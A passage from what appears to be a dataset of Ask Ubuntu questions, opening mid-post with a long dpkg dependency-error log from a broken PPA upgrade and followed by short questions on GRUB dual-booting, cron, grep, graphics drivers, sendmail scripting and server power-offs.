gir1.2-webkit-3.0 : gir1.2-webkit-3.0 depends on gir1.2-javascriptcoregtk-3.0 ( = 1.10.2-0ubuntu1 ) ; however : version of gir1.2-javascriptcoregtk-3.0 on system is 2.0.4-2~ubuntu13.04.1 . gir1.2-webkit-3.0 depends on libwebkitgtk-3.0-0 ( > = 1.9.90 ) ; however : package libwebkitgtk-3.0-0 is not configured yet . dpkg : error processing gir1.2-webkit-3.0 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libharfbuzz0 : amd64 : libharfbuzz0a : amd64 ( 0.9.18-3~raring1 ) breaks libharfbuzz0 and is installed . libharfbuzz0a : i386 ( 0.9.18-3~raring1 ) breaks libharfbuzz0 and is installed . dpkg : error processing libharfbuzz0 : amd64 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libharfbuzz0 : i386 : libharfbuzz0a : amd64 ( 0.9.18-3~raring1 ) breaks libharfbuzz0 and is installed . libharfbuzz0a : i386 ( 0.9.18-3~raring1 ) breaks libharfbuzz0 and is installed . dpkg : error processing libharfbuzz0 : i386 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libmetacity-private0a : libmetacity-private0a depends on metacity-common ( = 1:2.34.13-0ubuntu1 ) ; however : version of metacity-common on system is 1:2.34.13-0ubuntu2~raring1 . dpkg : error processing libmetacity-private0a ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libvte-2.90-9 : libvte-2.90-9 depends on libvte-2.90-common ( = 1:0.34.2-0ubuntu2 ) ; however : version of libvte-2.90-common on system is 1:0.34.6-1ubuntu1~ubuntu13.04.1 . dpkg : error processing libvte-2.90-9 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of mutter : mutter depends on libmutter0a ; however : package libmutter0a is not installed . mutter depends on mutter-common ( = 3.6.3-0ubuntu2 ) ; however : version of mutter-common on system is 3.8.4-0ubuntu1~ubuntu13.04.1 . dpkg : error processing mutter ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of totem-mozilla : totem-mozilla depends on totem ( = 3.6.3-0ubuntu6 ) ; however : package totem is not configured yet . dpkg : error processing totem-mozilla ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libpango1.0-0 : amd64 : libpango1.0-0 : amd64 depends on libharfbuzz0 ( > = 0.6.0 ) ; however : package libharfbuzz0 : amd64 is not configured yet . libpangox-1.0-0 : amd64 ( 0.0.2-4~raring1 ) breaks libpango1.0-0 ( < < 1.32.5-2 ) and is installed . version of libpango1.0-0 : amd64 to be configured is 1.32.5-0ubuntu1 . dpkg : error processing libpango1.0-0 : amd64 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libpango1.0-0 : i386 : libpango1.0-0 : i386 depends on libharfbuzz0 ( > = 0.6.0 ) ; however : package libharfbuzz0 : i386 is not configured yet . libpangox-1.0-0 : amd64 ( 0.0.2-4~raring1 ) breaks libpango1.0-0 ( < < 1.32.5-2 ) and is installed . version of libpango1.0-0 : i386 to be configured is 1.32.5-0ubuntu1 . dpkg : error processing libpango1.0-0 : i386 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of gir1.2-pango-1.0 : gir1.2-pango-1.0 depends on libpango1.0-0 ( > = 1.32.5 ) ; however : package libpango1.0-0 : amd64 is not configured yet . dpkg : error processing gir1.2-pango-1.0 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of plymouth-label : plymouth-label depends on libpango1.0-0 ( > = 1.14.0 ) ; however : package libpango1.0-0 : amd64 is not configured yet . plymouth-label depends on libplymouth2 ( = 0.8.8-0ubuntu6 ) ; however : version of libplymouth2 : amd64 on system is 0.8.8-0ubuntu8~raring1 . plymouth-label depends on plymouth ( = 0.8.8-0ubuntu6 ) ; however : version of plymouth on system is 0.8.8-0ubuntu8~raring1 . dpkg : error processing plymouth-label ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of gnome-disk-utility : gnome-disk-utility depends on libpango1.0-0 ( > = 1.18.0 ) ; however : package libpango1.0-0 : amd64 is not configured yet . dpkg : error processing gnome-disk-utility ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libgtk-3-bin : libgtk-3-bin depends on libgtk-3-common ( = 3.6.4-0ubuntu8 ) ; however : version of libgtk-3-common on system is 3.8.2-3ubuntu4~raring1 . dpkg : error processing libgtk-3-bin ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of gnome-documents : gnome-documents depends on libpango1.0-0 ( > = 1.20.0 ) ; however : package libpango1.0-0 : amd64 is not configured yet . gnome-documents depends on libtracker-sparql-0.14-0 ( > = 0.10.0 ) ; however : package libtracker-sparql-0.14-0 is not installed . gnome-documents depends on gir1.2-pango-1.0 ; however : package gir1.2-pango-1.0 is not configured yet . gnome-documents depends on gir1.2-tracker-0.14 ; however : package gir1.2-tracker-0.14 is not installed . dpkg : error processing gnome-documents ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libpangomm-1.4-1 : amd64 : libpangomm-1.4-1 : amd64 depends on libpango1.0-0 ( > = 1.23.0 ) ; however : package libpango1.0-0 : amd64 is not configured yet . dpkg : error processing libpangomm-1.4-1 : amd64 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of nautilus : nautilus depends on libpango1.0-0 ( > = 1.20.0 ) ; however : package libpango1.0-0 : amd64 is not configured yet . nautilus depends on nautilus-data ( < < 1:3.7 ) ; however : version of nautilus-data on system is 1:3.8.2-0ubuntu1~ubuntu13.04.1 . dpkg : error processing nautilus ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libgtkhtml-4.0-0 : libgtkhtml-4.0-0 depends on libpango1.0-0 ( > = 1.18.0 ) ; however : package libpango1.0-0 : amd64 is not configured yet . libgtkhtml-4.0-0 depends on libgtkhtml-4.0-common ( = 4.6.4-0ubuntu1 ) ; however : version of libgtkhtml-4.0-common on system is 4.6.5-1~raring1 . dpkg : error processing libgtkhtml-4.0-0 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libgtkhtml-editor-4.0-0 : libgtkhtml-editor-4.0-0 depends on libgtkhtml-4.0-0 ( = 4.6.4-0ubuntu1 ) ; however : package libgtkhtml-4.0-0 is not configured yet . libgtkhtml-editor-4.0-0 depends on libgtkhtml-4.0-common ( = 4.6.4-0ubuntu1 ) ; however : version of libgtkhtml-4.0-common on system is 4.6.5-1~raring1 . dpkg : error processing libgtkhtml-editor-4.0-0 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of rhythmbox-mozilla : rhythmbox-mozilla depends on rhythmbox ( = 2.98-0ubuntu5 ) ; however : package rhythmbox is not configured yet . dpkg : error processing rhythmbox-mozilla ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of totem-plugins : totem-plugins depends on totem ( = 3.6.3-0ubuntu6 ) ; however : package totem is not configured yet . totem-plugins depends on libtotem0 ( < < 3.7 ) ; however : version of libtotem0 on system is 3.8.2-0ubuntu2~raring1 . totem-plugins depends on gir1.2-totem-1.0 ( = 3.6.3-0ubuntu6 ) ; however : version of gir1.2-totem-1.0 on system is 3.8.2-0ubuntu2~raring1 . totem-plugins depends on gir1.2-pango-1.0 ; however : package gir1.2-pango-1.0 is not configured yet . dpkg : error processing totem-plugins ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libgtkmm-3.0-1 : amd64 : libgtkmm-3.0-1 : amd64 depends on libpangomm-1.4-1 ( > = 2.27.1 ) ; however : package libpangomm-1.4-1 : amd64 is not configured yet . dpkg : error processing libgtkmm-3.0-1 : amd64 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of rhythmbox-plugin-magnatune : rhythmbox-plugin-magnatune depends on rhythmbox ( = 2.98-0ubuntu5 ) ; however : package rhythmbox is not configured yet . dpkg : error processing rhythmbox-plugin-magnatune ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of rhythmbox-plugin-zeitgeist : rhythmbox-plugin-zeitgeist depends on rhythmbox ( > = 2.98-0ubuntu5 ) ; however : package rhythmbox is not configured yet . rhythmbox-plugin-zeitgeist depends on rhythmbox ( < < 2.99 ) ; however : package rhythmbox is not configured yet . dpkg : error processing rhythmbox-plugin-zeitgeist ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of rhythmbox-plugin-cdrecorder : rhythmbox-plugin-cdrecorder depends on rhythmbox ( = 2.98-0ubuntu5 ) ; however : package rhythmbox is not configured yet . dpkg : error processing rhythmbox-plugin-cdrecorder ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of gnome-color-manager : gnome-color-manager depends on libpango1.0-0 ( > = 1.18.0 ) ; however : package libpango1.0-0 : amd64 is not configured yet . gnome-color-manager depends on libvte-2.90-9 ( > = 1:0.27.2 ) ; however : package libvte-2.90-9 is not configured yet . dpkg : error processing gnome-color-manager ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libbrasero-media3-1 : libbrasero-media3-1 depends on libpango1.0-0 ( > = 1.14.0 ) ; however : package libpango1.0-0 : amd64 is not configured yet . dpkg : error processing libbrasero-media3-1 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of brasero : brasero depends on libbrasero-media3-1 ( = 3.6.1-0ubuntu2 ) ; however : package libbrasero-media3-1 is not configured yet . brasero depends on libpango1.0-0 ( > = 1.14.0 ) ; however : package libpango1.0-0 : amd64 is not configured yet . dpkg : error processing brasero ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of gnome-icon-theme : gnome-icon-theme depends on libgtk-3-bin ; however : package libgtk-3-bin is not configured yet . dpkg : error processing gnome-icon-theme ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of gnome-icon-theme-full : gnome-icon-theme-full depends on gnome-icon-theme ( = 3.6.2-0ubuntu1 ) ; however : package gnome-icon-theme is not configured yet . dpkg : error processing gnome-icon-theme-full ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of brasero-cdrkit : brasero-cdrkit depends on libbrasero-media3-1 ( = 3.6.1-0ubuntu2 ) ; however : package libbrasero-media3-1 is not configured yet . dpkg : error processing brasero-cdrkit ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of gnome-icon-theme-symbolic : gnome-icon-theme-symbolic depends on gnome-icon-theme ; however : package gnome-icon-theme is not configured yet . dpkg : error processing gnome-icon-theme-symbolic ( -- configure ) : dependency problems - leaving unconfigured errors were encountered while processing : libwebkitgtk-1.0-0 libwebkitgtk-3.0-0 rhythmbox-plugins rhythmbox totem gir1.2-webkit-3.0 libharfbuzz0 : amd64 libharfbuzz0 : i386 libmetacity-private0a libvte-2.90-9 mutter totem-mozilla libpango1.0-0 : amd64 libpango1.0-0 : i386 gir1.2-pango-1.0 plymouth-label gnome-disk-utility libgtk-3-bin gnome-documents libpangomm-1.4-1 : amd64 nautilus libgtkhtml-4.0-0 libgtkhtml-editor-4.0-0 rhythmbox-mozilla totem-plugins libgtkmm-3.0-1 : amd64 rhythmbox-plugin-magnatune rhythmbox-plugin-zeitgeist rhythmbox-plugin-cdrecorder gnome-color-manager libbrasero-media3-1 brasero gnome-icon-theme gnome-icon-theme-full brasero-cdrkit gnome-icon-theme-symbolic and this is from apt-get install -f : the following packages have unmet dependencies : empathy : depends : libgudev-1.0-0 ( > = 146 ) but 1:198-0ubuntu11.2 is installed depends : libpango-1.0-0 ( > = 1.18.0 ) but it is not installed depends : libpulse-mainloop-glib0 ( > = 1:0.99.1 ) but 1:3.0-0ubuntu6 is installed depends : libpulse0 ( > = 1:0.99.1 ) but 1:3.0-0ubuntu6 is installed depends : empathy-common ( = 3.8.3-0ubuntu1~raring1 ) but 3.8.3-0ubuntu1~raring1 is installed depends : telepathy-mission-control-5 ( > = 1:5.12.0 ) but 1:5.14.0-0ubuntu2 is installed file-roller : depends : nautilus-data ( > = 1:3.0 ) but 1:3.8.2-0ubuntu1~ubuntu13.04.1 is installed depends : libnautilus-extension1a ( > = 1:2.91 ) but 1:3.6.3-0ubuntu16 is installed depends : libpango-1.0-0 ( > = 1.14.0 ) but it is not installed gdm : depends : libaudit1 ( > = 1:2.2.1 ) but 1:2.2.2-1ubuntu4 is installed depends : libgdm ( = 3.8.1.1-0ubuntu6~raring2 ) but 3.8.1.1-0ubuntu6~raring2 is installed depends : libpango-1.0-0 ( > = 1.14.0 ) but it is not installed depends : libwrap0 ( > = 7.6-4~ ) but 7.6.q-24 is installed depends : libxrandr2 ( > = 2:1.2.99.3 ) but 2:1.4.0-1ubuntu1.1 is installed depends : upstart-job but it is a virtual package depends : x11-common ( > = 1:7.6+11 ) but 1:7.7+1ubuntu4 is installed gedit : depends : libpango-1.0-0 ( > = 1.14.0 ) but it is not installed gir1.2-webkit-3.0 : depends : gir1.2-javascriptcoregtk-3.0 ( = 1.10.2-0ubuntu1 ) but 2.0.4-2~ubuntu13.04.1 is installed depends : gir1.2-gtk-3.0 ( > = 3.0.0 ) but 3.8.2-3ubuntu4~raring1 is installed gnome-calculator : depends : libpango-1.0-0 ( > = 1.14.0 ) but it is not installed gnome-documents : depends : libtracker-sparql-0.14-0 ( > = 0.10.0 ) but it is not installed depends : gir1.2-tracker-0.14 but it is not installed gnome-shell : depends : gir1.2-mutter-3.0 ( > = 3.8.3 ) but it is not installed depends : libgjs0-libmozjs-17.0-0 but it is a virtual package depends : libmutter0b ( > = 3.8 ) but it is not installed depends : libmutter0b ( < 3.9 ) but it is not installed depends : libpango-1.0-0 ( > = 1.14.0 ) but it is not installed depends : libpangocairo-1.0-0 ( > = 1.14.0 ) but it is not installed depends : libpulse-mainloop-glib0 ( > = 1:0.99.1 ) but 1:3.0-0ubuntu6 is installed depends : libpulse0 ( > = 1:0.99.1 ) but 1:3.0-0ubuntu6 is installed depends : libxfixes3 ( > = 1:4.0.1 ) but 1:5.0-4ubuntu5.13.04.1 is installed depends : libxi6 ( > = 2:1.2.99.4 ) but 2:1.6.99.1-0ubuntu3.1 is installed depends : gnome-shell-common ( = 3.8.3-1ubuntu5~raring3 ) but 3.8.3-1ubuntu5~raring3 is installed depends : evolution-data-server ( > = 3.5.3 ) but it is not installed gnome-sushi : depends : libgjs0-libmozjs-17.0-0 but it is a virtual package depends : libpango-1.0-0 ( > = 1.14.0 ) but it is not installed gnome-system-log : depends : libpango-1.0-0 ( > = 1.14.0 ) but it is not installed depends : zlib1g ( > = 1:1.1.4 ) but 1:1.2.7.dfsg-13ubuntu2 is installed libevview3-3 : depends : libpango-1.0-0 ( > = 1.14.0 ) but it is not installed libgail-3-0 : depends : libgtk-3-0 ( = 3.8.2-3ubuntu4~raring1 ) but 3.8.2-3ubuntu4~raring1 is installed depends : libpango-1.0-0 ( > = 1.32.4 ) but it is not installed libgcr-ui-3-1 : depends : libpango-1.0-0 ( > = 1.18.0 ) but it is not installed libgoa-1.0-0 : depends : libpango-1.0-0 ( > = 1.14.0 ) but it is not installed depends : libgoa-1.0-common ( = 3.8.2-1ubuntu1.1~raring1 ) but 3.8.2-1ubuntu1.1~raring1 is installed libgtk-3-0 : depends : libgtk-3-common ( = 3.8.2-3ubuntu4~raring1 ) but 3.8.2-3ubuntu4~raring1 is installed depends : libpango-1.0-0 ( > = 1.32.4 ) but it is not installed depends : libpangocairo-1.0-0 ( > = 1.32.4 ) but it is not installed depends : libpangoft2-1.0-0 ( > = 1.32.4 ) but it is not installed depends : libx11-6 ( > = 2:1.4.99.1 ) but 2:1.5.0-1ubuntu1.1 is installed depends : libxcomposite1 ( > = 1:0.3-1 ) but 1:0.4.3-2build2 is installed depends : libxdamage1 ( > = 1:1.1 ) but 1:1.1.3-2build2 is installed depends : libxi6 ( > = 2:1.2.99.4 ) but 2:1.6.99.1-0ubuntu3.1 is installed depends : libxrandr2 ( > = 2:1.2.99.3 ) but 2:1.4.0-1ubuntu1.1 is installed libgtk-3-bin : depends : libgtk-3-0 ( > = 3.6.4-0ubuntu8 ) but 3.8.2-3ubuntu4~raring1 is installed depends : libgtk-3-common ( = 3.6.4-0ubuntu8 ) but 3.8.2-3ubuntu4~raring1 is installed libgtkhtml-4.0-0 : depends : libgtkhtml-4.0-common ( = 4.6.4-0ubuntu1 ) but 4.6.5-1~raring1 is installed libgtkhtml-editor-4.0-0 : depends : libgtkhtml-4.0-0 ( = 4.6.4-0ubuntu1 ) but 4.6.4-0ubuntu1 is installed depends : libgtkhtml-4.0-common ( = 4.6.4-0ubuntu1 ) but 4.6.5-1~raring1 is installed libharfbuzz0a : depends : libc6 ( > = 2.14 ) but 2.17-0ubuntu5 is installed depends : libfreetype6 ( > = 2.3.9 ) but 2.4.12-0ubuntu0ppa1 is installed depends : libglib2.0-0 ( > = 2.30.0 ) but 2.36.0-1ubuntu2 is installed libharfbuzz0a : i386 : depends : libc6 ( > = 2.4 ) but 2.17-0ubuntu5 is installed depends : libfreetype6 ( > = 2.3.9 ) but 2.4.12-0ubuntu0ppa1 is installed depends : libglib2.0-0 ( > = 2.30.0 ) but 2.36.0-1ubuntu2 is installed libmetacity-private0a : depends : metacity-common ( = 1:2.34.13-0ubuntu1 ) but 1:2.34.13-0ubuntu2~raring1 is installed libpangox-1.0-0 : depends : libc6 ( > = 2.4 ) but 2.17-0ubuntu5 is installed depends : libglib2.0-0 ( > = 2.34.0 ) but 2.36.0-1ubuntu2 is installed depends : libpango-1.0-0 ( > = 1.32.5-3~ ) but it is not installed libvte-2.90-9 : depends : libvte-2.90-common ( = 1:0.34.2-0ubuntu2 ) but 1:0.34.6-1ubuntu1~ubuntu13.04.1 is installed libwebkitgtk-1.0-0 : depends : libjavascriptcoregtk-1.0-0 ( = 1.10.2-0ubuntu1 ) but 2.0.4-2~ubuntu13.04.1 is installed depends : libatk1.0-0 ( > = 1.12.4 ) but 2.8.0-1 is installed depends : libc6 ( > = 2.14 ) but 2.17-0ubuntu5 is installed depends : libfontconfig1 ( > = 2.9.0 ) but 2.10.93-0ubuntu1~raring1 is installed depends : libfreetype6 ( > = 2.2.1 ) but 2.4.12-0ubuntu0ppa1 is installed depends : libgail18 ( > = 1.18.0 ) but 2.24.17-0ubuntu2 is installed depends : libgdk-pixbuf2.0-0 ( > = 2.22.0 ) but 2.28.1-1ubuntu1~raring1 is installed depends : libglib2.0-0 ( > = 2.31.8 ) but 2.36.0-1ubuntu2 is installed depends : libgtk2.0-0 ( > = 2.24.3 ) but 2.24.17-0ubuntu2 is installed depends : libicu48 ( > = 4.8-1 ) but 4.8.1.1-12 is installed depends : libjpeg8 ( > = 8c ) but 8c-2ubuntu7 is installed depends : libpango1.0-0 ( > = 1.22.0 ) but 1.32.5-0ubuntu1 is installed depends : libsoup2.4-1 ( > = 2.39.3 ) but 2.42.2-3~raring1 is installed depends : libsqlite3-0 ( > = 3.5.9 ) but 3.7.15.2-1ubuntu1 is installed depends : libstdc++6 ( > = 4.6 ) but 4.7.3-1ubuntu1 is installed depends : libxcomposite1 ( > = 1:0.3-1 ) but 1:0.4.3-2build2 is installed depends : libxdamage1 ( > = 1:1.1 ) but 1:1.1.3-2build2 is installed depends : libxml2 ( > = 2.7.4 ) but 2.9.0+dfsg1-4ubuntu4.3 is installed depends : zlib1g ( > = 1:1.2.0 ) but 1:1.2.7.dfsg-13ubuntu2 is installed libwebkitgtk-3.0-0 : depends : libjavascriptcoregtk-3.0-0 ( = 1.10.2-0ubuntu1 ) but 2.0.4-2~ubuntu13.04.1 is installed depends : libatk1.0-0 ( > = 1.12.4 ) but 2.8.0-1 is installed depends : libc6 ( > = 2.14 ) but 2.17-0ubuntu5 is installed depends : libfontconfig1 ( > = 2.9.0 ) but 2.10.93-0ubuntu1~raring1 is installed depends : libfreetype6 ( > = 2.2.1 ) but 2.4.12-0ubuntu0ppa1 is installed depends : libgail-3-0 ( > = 3.0.0 ) but 3.8.2-3ubuntu4~raring1 is installed depends : libgdk-pixbuf2.0-0 ( > = 2.22.0 ) but 2.28.1-1ubuntu1~raring1 is installed depends : libglib2.0-0 ( > = 2.31.8 ) but 2.36.0-1ubuntu2 is installed depends : libgtk-3-0 ( > = 3.3.18 ) but 3.8.2-3ubuntu4~raring1 is installed depends : libicu48 ( > = 4.8-1 ) but 4.8.1.1-12 is installed depends : libjpeg8 ( > = 8c ) but 8c-2ubuntu7 is installed depends : libpango1.0-0 ( > = 1.22.0 ) but 1.32.5-0ubuntu1 is installed depends : libsoup2.4-1 ( > = 2.39.3 ) but 2.42.2-3~raring1 is installed depends : libsqlite3-0 ( > = 3.5.9 ) but 3.7.15.2-1ubuntu1 is installed depends : libstdc++6 ( > = 4.6 ) but 4.7.3-1ubuntu1 is installed depends : libxcomposite1 ( > = 1:0.3-1 ) but 1:0.4.3-2build2 is installed depends : libxdamage1 ( > = 1:1.1 ) but 1:1.1.3-2build2 is installed depends : libxml2 ( > = 2.7.4 ) but 2.9.0+dfsg1-4ubuntu4.3 is installed depends : zlib1g ( > = 1:1.2.0 ) but 1:1.2.7.dfsg-13ubuntu2 is installed mutter : depends : libmutter0a but it is not installed depends : mutter-common ( = 3.6.3-0ubuntu2 ) but 3.8.4-0ubuntu1~ubuntu13.04.1 is installed nautilus : plymouth-label : depends : libc6 ( > = 2.2.5 ) but 2.17-0ubuntu5 is installed depends : libcairo2 ( > = 1.2.4 ) but 1.12.14-0ubuntu1 is installed depends : libglib2.0-0 ( > = 2.12.0 ) but 2.36.0-1ubuntu2 is installed depends : libpango1.0-0 ( > = 1.14.0 ) but 1.32.5-0ubuntu1 is installed depends : libplymouth2 ( = 0.8.8-0ubuntu6 ) but 0.8.8-0ubuntu8~raring1 is installed depends : plymouth ( = 0.8.8-0ubuntu6 ) but 0.8.8-0ubuntu8~raring1 is installed rhythmbox : depends : libgtk-3-0 ( > = 3.4.0 ) but 3.8.2-3ubuntu4~raring1 is installed depends : librhythmbox-core6 ( = 2.98-0ubuntu5 ) but 2.98-0ubuntu5 is installed depends : libtotem-plparser17 ( > = 3.2.0 ) but 3.4.5-1~raring1 is installed depends : rhythmbox-data ( = 2.98-0ubuntu5 ) but 2.98-0ubuntu5 is installed depends : gir1.2-rb-3.0 ( = 2.98-0ubuntu5 ) but 2.99.1-0ubuntu1~raring1 is installed rhythmbox-plugins : depends : libgtk-3-0 ( > = 3.4.0 ) but 3.8.2-3ubuntu4~raring1 is installed depends : libgudev-1.0-0 ( > = 146 ) but 1:198-0ubuntu11.2 is installed depends : librhythmbox-core6 ( = 2.98-0ubuntu5 ) but 2.98-0ubuntu5 is installed depends : libtotem-plparser17 ( > = 3.2.0 ) but 3.4.5-1~raring1 is installed depends : rhythmbox ( = 2.98-0ubuntu5 ) but 2.98-0ubuntu5 is installed depends : gir1.2-rb-3.0 ( = 2.98-0ubuntu5 ) but 2.99.1-0ubuntu1~raring1 is installed totem : depends : libnautilus-extension1a ( > = 1:2.91 ) but 1:3.6.3-0ubuntu16 is installed depends : libtotem0 ( > = 3.6.3-0ubuntu6 ) but 3.8.2-0ubuntu2~raring1 is installed where should i start ? thanks in advance ! edit : i removed gnome 3 ppa with help of ppa-purge and then run apt-get autoclean
354799	high cpu usage causes server power off	my first post here , so apologies if anything is missing . i currently have an ubuntu hosted vps , which periodically runs a php script which does a lot of regex processing and interaction with a local mysql database ( this is running percona server ) . it is a dual core vps , and at one point when the script runs , the processors jump to 100 % each for a period of time . i run a mbstat -p 0,1 1 to report the cpu usage , and it is pretty much a minute of high usage , and the server turns itself off - it does n't shutdown , it powers off . my provider is suggesting that this is a software ( os ) problem . i have recently updated the kernel , but i can not find anything relating to settings that would cause the server to power down completely . i have looked through all the logs i can find ( through /var/log anyway ) and ca n't find anything of note . not even anything in there saying that it 's being powered down or there is a problem . this is what led me to think that this may be a provider setting that shuts the vps down when it sees high cpu use . ubuntu version : 12.04.3 lts x64 kernel version : 3.2.0-54-generic please let me know if you require any other information . any help that anyone could offer would be much appreciated . thanks !
354800	google play movies on saucy	after hal being removed from the repositories i am not able to play protected flash content . i.e . google play movies with saucy . is there any workaround ?
354801	video flickering with kazam	i 'm using ubuntu for first time since yesterday , i recorded a video with kazam , all was smooth and perfect in live performance , but recorded video have some flickers , 多this is because a faulty driver ? or it 's normal with kazam and 1200p ? . note : i converted video to 1080hd and uploaded to youtube . http : //www.youtube.com/watch ? v=7sqed50wkxw sorry for bad english..
354802	how to use grep to search for a word which can be followed and/or preceded by a non alphabetical character ?	i want to search for javascript variables . so if my variable is geometry i want grep to return all lines like this e.g . geometry.property1 myfunc ( geometry ) etc.. but not these geometrymark.property2 or mygeometry.property3 so basically dont return instances where geometry is followed and/or preceded by a-z or a-z characters
354805	ubuntu 12.10 with video and audio out of sync	movies do not play in sync . audio and video not matching . using the latest vlc to no avail . ubuntu is fully updated too .
354808	error when try to boot:	http : //tau.rghost.ru/49221058/image.png i do n't understand what should i write here
354809	shell script unable to send execution time via email	i wrote a shell script which calculates the execution time of itself but the problem i 'm facing is its not able to send the time difference via email . please help . here is the script # ! /bin/bash start= $ ( date + % s. % n ) ls /etc > /tmp/x rm /tmp/x executiontime ( ) { end= $ ( date + % s. % n ) diff= $ ( echo `` $ end- $ start '' | bc ) echo `` inside function $ diff '' } # email function sender= '' sendmail '' recpt= '' tarun @ example.com '' sub= '' test '' message= '' sendmail function $ diff '' # sendmail function sendmailfun ( ) { sendmail -f $ sender -it < < end_message to : $ recpt subject : $ sub $ message end_message } executiontime echo `` outside function $ diff '' sendmailfun when i run this script the output on the cmd line is like follows root @ itpl-lptp-008 : /home/incaendo/downloads # sh executiontest.sh inside function .008025182 outside function .008025182 but the email i get after executing the above script just have the line as follows sendmail function i.e . without the $ diff value . why so ? is there anyway i can send the time difference via email .
354815	why ureadahead is concurrent ?	my ubuntu seems to use ureadahead concurent at startup even if i have hdd . the boot chart i have ubuntu 13.04 64 bit
354817	how do i show the grub menu in grub 2	how do i show the grub menu in grub 2 during boot up ?
354821	ubuntu on asus slider sl101	i would love to have ubuntu on my asus eeepad slider sl101 . i found out that , due to its hardware it is similar to the tf101 . unfortunately every thread i found on the sl101 is without the inbuilt hardware keyboard . is there any chance to get this working ? before nobody uses the sl101 anymore . i know there are not that many using this device . any chance ?
354825	windows 8 not booting from gnu grub after ubuntu 12.04 installation	windows 8 is installed on ssd # 1 . ubuntu 12.04 is installed on ssd # 2 . after installing ubuntu , i 'm unable to boot from gnu grub to the windows 8 . when i try it , windows logo flashes for a second and computer restarts . i managed to log to the windows by changing disk boot priority ( ssd # 1-storage hdd-ssd # 2 ) . it had to repair itself first though . ( fortunately did n't need the disk ) i had no such problem when i was trying fedora 19 two days ago . how to i fix it so windows 8 can be booted from grub ? $ sudo update-grub should fix it ? i 'm kind of scared of messing up the w8 - took me a long time to configure everything .
354826	how to turn off geany message window by default ?	i use geany to do simple text editing and viewing . but its message window takes half the area and is useless for me . i want to turn it off when i run geany . i know there is a command option -- no-msgwin for that . but how can i tell geany not to show message window if i start geany from right click menu ? is there such a configuration option ? or , can i can configure geany to have a minimal message window size when geany starts ?
354827	how to upgrade from 11.10 to 12.04 using an usb ?	i wanted to remove ubuntu but now i just love it ! i want to update my ubuntu from 11.10 to 12.04 lts using an usb . if you could tell me the steps it would be great . thank you !
354829	bumblebee problem after installation	yesterday i was using kubuntu 13.10 . i had a problem using my intel and nvidia graphics cards . i thought this was a kde problem , so i changed distros to xubuntu . after the installation i installed steam and it was working . i was happy . i got this error error : could not open display :8 next i installed an update , and after the update i was trying to install nvidia-prime but after restarting lightdm did n't start . i reinstalled xubuntu , installed an update , and install the nvidia-319 driver and bumblebee using the following commands : sudo apt-get install nvidia-319 nvidia-settings-319 sudo apt-get install bumblebee linux-headers-generic i restarted the computer and installed steam . after steam started i got an error exactly like the error i got before on kubuntu . while using the intel card and running steam i got this error : error : could not open display :8 nvidia running using bumblebee was giving me a primus error . i reinstalled the operating system again and installed updates and steam is working . how do i install bumblebee without getting a graphic cards problem ?
354830	is this things-to-do-after-installing-ubuntu script safe ?	i am going to install ubuntu 12.04 , and i wonder if i should trust/run the .sh script proposed on this site : things to do after installing ubuntu 12.04 precise pangolin . by the way , do i need to anything in particular after installing ubuntu ?
354837	'mount : error while loading shared libraries : libudev.so.0 : no such file or directory ' error while booting	i was trying to load a version of cgminer which was returning a libudev type error , and followed a supposed solution here but it destroyed my system ( so it seems ) . i loaded the system in recovery mode from grub but all that done was actually tell me what i something is broken , do not know what to do next . i think i somehow associated a libudev.so.0 to 1 or 1 to 0 , i am not sure what i did and how to fix it .
354838	is there a single line command to do `su` ?	i can do an su with su < username > and it asks for my password . is there a password parameter for su such that i wont be prompted for a password ? e.g . su < username > -p < password >
354840	can i install software on a bootable usb key ?	i have a question . say i make a bootable usbkey , what would happen if i install some software with synaptic ? will it persists over boots ( like if it was a real hard drive ) . or should i create another `` data '' partition on the usb key ? regards
354843	cronjob is not running , but works from scheduler	i have this script for file show.sh # ! /bin/sh zenity -- warning -- text `` here '' in crontab i have this line * * * * * /home/user/public/show.sh then i restarted my crontab user @ user-170 : ~/public $ sudo /etc/init.d/cron restart rather than invoking init scripts through /etc/init.d , use the service ( 8 ) utility , e.g . service cron restart since the script you are attempting to invoke has been converted to an upstart job , you may also use the stop ( 8 ) and then start ( 8 ) utilities , e.g . stop cron ; start cron . the restart ( 8 ) utility is also available . cron stop/waiting cron start/running , process 5672 user @ user-170 : ~/public $ but i am waiting and nothing is happening and when i open schedule task software and run the script from there is show me a pop-up . why is this not work from crontab ?
